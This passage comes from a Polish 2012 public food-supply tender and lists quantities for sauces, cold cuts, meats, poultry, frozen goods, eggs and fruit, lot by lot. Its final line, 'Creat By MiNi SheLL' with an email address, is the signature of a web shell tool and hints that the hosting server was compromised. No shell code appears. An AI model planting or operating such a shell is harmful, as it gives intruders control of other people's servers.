107	Sałatki obiadowe (słoik 1L) .......................................	szt.	145
108	Sałatki obiadowe (słoik 1L) .......................................	szt.	145
109	Smalec	kg.	72,5
110	Sos bolognese (duże opakowanie ........)	szt.	29
111	Sos cygański (duże opakowanie ........)	szt.	2,9
112	Sos grzybowy (duże opakowanie ........)	szt.	29
113	Sos ogrodowy(duże opakowanie ........)	szt.	43,5
114	Sos pieczeniowy (duże opakowanie ........)	szt.	29
115	Sos sałatkowy (duże opakowanie ........)	szt.	29
116	Sos serowo brokułowy(duże opakowanie ........)	szt.	23,2
117	Sól 	kg.	725
118	Tymianek (małe opakowanie ........)	szt.	145
119	woda mineralna 0,5L gaz/ngaz	szt.	2175
120	Zasmażka ciemna (duże opakowanie ........)	szt.	29
121	Zasmażka jasna (duże opakowanie ........)	szt.	14,5
122	Ziele angielskie (duże opakowanie ........)	szt.	2,9
123	Zioła prowansalskie  (duże opakowanie ........)	szt.	2,9
124	Zupa w proszku barszcz biały (op ok 1 kg)	szt.	14,5
125	Zupa w proszku barszcz czerwony (op ok 1 kg)	szt.	14,5
126	Zupa w proszku borowikowa (op ok 1 kg)	szt.	29
127	Zupa w proszku brokułowa (op ok 1 kg)	szt.	7,25
128	Zupa w proszku krem z borowików (op ok 1 kg)	szt.	14,5
129	Zupa w proszku szpinakowa (op ok 1 kg)	szt.	8,7
130	Zupa w proszku żurek (op ok 1 kg)	szt.	14,5
131	Zupa w proszku żurek (op ok 3 kg)	szt.	14,5
132	Żelatyna (duże opakowanie ........)	szt.	2,9
133	napój w proszku 1 kg (różne smaki)	szt.	435.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wędliny krótko i długotrwałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Blok szynkowy	kg.	290
2	Boczek wędzony	kg.	435
3	Frankfurterki	kg.	290
4	Kiełbasa biała parzona	kg.	435
5	Kiełbasa biała surowa	kg.	290
6	Kiełbasa golonkowa	kg.	290
7	Kiełbasa jałowcowa	kg.	290
8	Kiełbasa krakowska parzona	kg.	290
9	Kiełbasa krakowska sucha	kg.	290
10	Kiełbasa Mortadela	kg.	870
11	Kiełbasa ogniskowa 	kg.	290
12	Kiełbasa słoikowa	kg.	290
13	Kiełbasa szynkowa	kg.	290
14	Kiełbasa śląska	kg.	290
15	Kiełbasa tyrolska	kg.	290
16	Kiełbasa zwyczajna	kg.	1450
17	Kiełbaski koktailowe	kg.	290
18	Metka	kg.	145
19	Mielonka	kg.	72,5
20	Ogonówka	kg.	290
21	Parówki cieńkie	kg.	435
22	Parówki grube	kg.	290
23	Pasztet pieczony	kg.	145
24	Pierś wędzona z indyka	kg.	290
25	Polędwica drobiowa	kg.	290
26	Polędwica sopocka	kg.	290
27	Serdelki 	kg.	72,5
28	Szynka domowa	kg.	290
29	Szynka gotowana	kg.	290
30	Szynka pieczona	kg.	290
31	Szynka tyrolska	kg.	290
32	Szynka wędzona drobiowa	kg.	290
33	Szynkówka	kg.	290
34	Wątrobianka	kg.	290
35	Wędzonka krotoszyńska	kg.	290.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso wieprzowe i wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Boczek surowy	kg.	145
2	Golonka peklowana w siatce	kg.	435
3	Karkówka b/k	kg.	1450
4	Kości wieprzowe schabowe	kg.	870
5	Łopatka b/k	kg.	2320
6	Mięso gulaszowe	kg.	725
7	Mięso mielone	kg.	290
8	Mięso mielone stekowe	kg.	290
9	Mięso wołowe rosołowe	kg.	217,5
10	Rosbeft	kg.	217,5
11	Schab b/k	kg.	435
12	Wątroba wieprzowa	kg.	870
13	Wołowina zrazowa	kg.	145
14	Żeberka wieprzowe	kg.	290.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet drobiowy 	kg.	2175
2	Korpusy drobiowe	kg.	1450
3	Mięso gulaszowe drobiowe 	kg.	435
4	Serca drobiowe	kg.	145
5	Skrzydełka drobiowe	kg.	870
6	Skrzydła z indyka	kg.	72,5
7	Udka drobiowe	kg.	2175
8	Wątróbki drobiowe	kg.	580
9	Żołądki drobiowe	kg.	290.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Produkty głęboko mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Barszcz ukraiński	kg.	72,5
2	Brokuły (2,5 kg)	kg.	145
3	Brukselka	kg.	145
4	Bukiet warzyw (2,5 kg)	kg.	290
5	Fasolka zielona (2,5 kg)	kg.	290
6	Fasolka żółta (2,5 kg)	kg.	435
7	Flaki blanszowane 1kg	kg.	145
8	Frytki (2,5 kg)	kg.	290
9	Kalafior (2,5 kg)	kg.	145
10	Kluski parowane	kg.	580
11	Krokiety	kg.	290
12	Marchew kostka	kg.	145
13	Marchew z groszkiem (2,5 kg)	kg.	290
14	Mieszanka 6 składnikowa (2,5 kg)	kg.	290
15	Mieszanka kompotowa	kg.	290
16	Pierogi z serem	kg.	725
17	Porzeczka czarna	kg.	580
18	Pyzy z mięsem 10 kg	kg.	580
19	Pyzy ziemniaczane 10 kg	kg.	580
20	Szpinak (2,5 kg)	kg.	72,5
21	Tortilla	kg.	290
22	Truskawki (2,5 kg)	kg.	362,5
23	Warzywa na patelnię (2,5 kg)	kg.	362,5
24	Włoszczyzna (2,5 kg)	kg.	362,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jajka 	szt.	43500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Owoce cytrusowe, pieczarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Banany	kg.	290
2	Brzoskwinie import	kg.	145
3	Cytryny	kg.	290
4	Kiwi	opak.	145
5	Mandarynki	kg.	290
6	Nektarynki	kg.	290
7	Pieczarki	kg.	1450
8	Winogron	kg.	145.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com